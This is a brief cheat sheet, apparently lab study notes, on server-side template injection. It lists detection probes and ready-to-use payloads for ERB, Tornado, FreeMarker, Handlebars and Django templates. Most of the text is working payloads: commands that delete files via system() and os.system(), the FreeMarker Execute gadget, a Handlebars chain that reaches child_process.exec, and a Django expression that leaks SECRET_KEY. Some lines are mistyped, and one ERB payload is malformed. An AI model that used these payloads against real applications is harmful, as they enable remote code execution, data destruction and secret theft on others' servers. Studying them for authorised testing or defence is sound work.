# Server Side Templete Injection
```bash
Methods to find SSTI
1. Firstly find the place where the template is reflected
2. Supply irregular input and try to get template type information
3. use the arbitry payload to check presence of SSTI
4. If SSTI is positive then supply corrosponding payloads to exploit
```
* [ ] ERB (Ruby) Template injection
```bash
* The arbitary payloads to be URL encoded first to execute
| ERB TEMPLATE |
<%= 7 * 7 %> | arbitary code to check SSTI
%= system("rm /home/carlos/morale.txt") %> | arbitary code to remove files
```
* [ ] Tornado Template Injection
```bash
{{7*7}} = 49 | arbitary code to check template injection
{{os.system('whoami')}}
{{os.system('rm('/your/directory/here')')}} | arbitary payload
```
* [ ] Freemaker Template Injection
{% code overflow="wrap" %}
```bash
${foobar} | this arbiraty command will return error and confirms SSTI
The new() in the freemaker template is too dangerous | hackers can exploit to run RCE
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm /home/carlos/morale.txt") }
```
{% endcode %}
* [ ] Website uses handle bars
{% code overflow="wrap" %}
```bash
wrtz{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
code by @Zombiehelp54. | URL Encode it first
```
{% endcode %}
* [ ] SSTI in Django based Templates
{% code overflow="wrap" %}
```bash
{{7*7}} | pass the arbitary code to check the SSTI and template vesrion
By default the Django template has the debug property which can be called by
Observing the outputs and the settings parameter is seen there not secqurely embedded
{{settings.SECRET_KEY}} | passing settings to revel the contents of the hidden parameters
```
{% endcode %}